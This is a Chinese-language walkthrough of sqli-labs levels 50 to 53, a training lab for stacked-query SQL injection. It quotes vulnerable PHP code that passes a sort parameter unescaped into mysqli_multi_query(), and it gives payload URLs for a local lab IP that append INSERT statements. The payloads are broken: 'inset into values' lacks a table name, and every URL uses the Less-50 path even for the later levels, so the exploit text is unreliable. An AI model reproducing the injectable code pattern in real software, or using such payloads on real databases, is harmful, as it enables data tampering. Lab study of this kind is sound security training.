0x1第五十关
源码中使用的mysqli_multi_query()函数,而之前使用的是mysqli_query(),区别在于mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,那么我们此处就可以执行多个sql语句进行注入,也就是说的堆叠注入。
$sql="SELECT * FROM users ORDER BY $id"; /* execute multi query */ if (mysqli_multi_query($con1, $sql)) { ?> <center> <font color= "#00FF00" size="4"> <table border=1'> <tr> <th> ID </th> <th> USERNAME </th> <th> PASSWORD </th> </tr> </font> </font> <?php /* store first result set */ if ($result = mysqli_store_result($con1)) { while($row = mysqli_fetch_row($result)) { echo '<font color= "#00FF11" size="3">'; echo "<tr>"; echo "<td>"; printf("%s", $row[0]); echo "</td>"; echo "<td>"; printf("%s", $row[1]); echo "</td>"; echo "<td>"; printf("%s", $row[2]); echo "</td>"; echo "</tr>"; echo "</font>"; } } echo "</table>"; } else { echo '<font color= "#FFFF00">'; print_r(mysqli_error($con1)); echo "</font>"; } } else { echo "Please input parameter as SORT with numeric value<br><br><br><br>"; echo "<br><br><br>"; echo '<img src="../images/Less-50.jpg" /><br>'; }
方法和三十九关同样
SQL语句: $sql="SELECT * FROM users ORDER BY $id";
payload: http://192.168.232.135/sqli-labs-master/Less-50/?sort=1;inset into values(1000,'test','test')#
0x2 第五十一关
同样的这关也是使用的mysqli_multi_query()函数,不同点在于sql语句
SQL语句: $sql="SELECT * FROM users ORDER BY '$id'";
payload: http://192.168.232.135/sqli-labs-master/Less-50/?sort=1';inset into values(2000,'test','test')#
0x3 第五十二关
同样的这关和五十关一样也是使用的mysqli_multi_query()函数,不同点在于sql语句和没有报错信息
SQL语句: $sql="SELECT * FROM users ORDER BY $id";
payload: http://192.168.232.135/sqli-labs-master/Less-50/?sort=1;inset into values(3000,'test','test')#
0x4第五十三关
同样的这关和五十一关一样也是使用的mysqli_multi_query()函数,不同点在于sql语句和没有报错信息
SQL语句: $sql="SELECT * FROM users ORDER BY '$id'";
payload: http://192.168.232.135/sqli-labs-master/Less-50/?sort=1';inset into values(4000,'test','test')#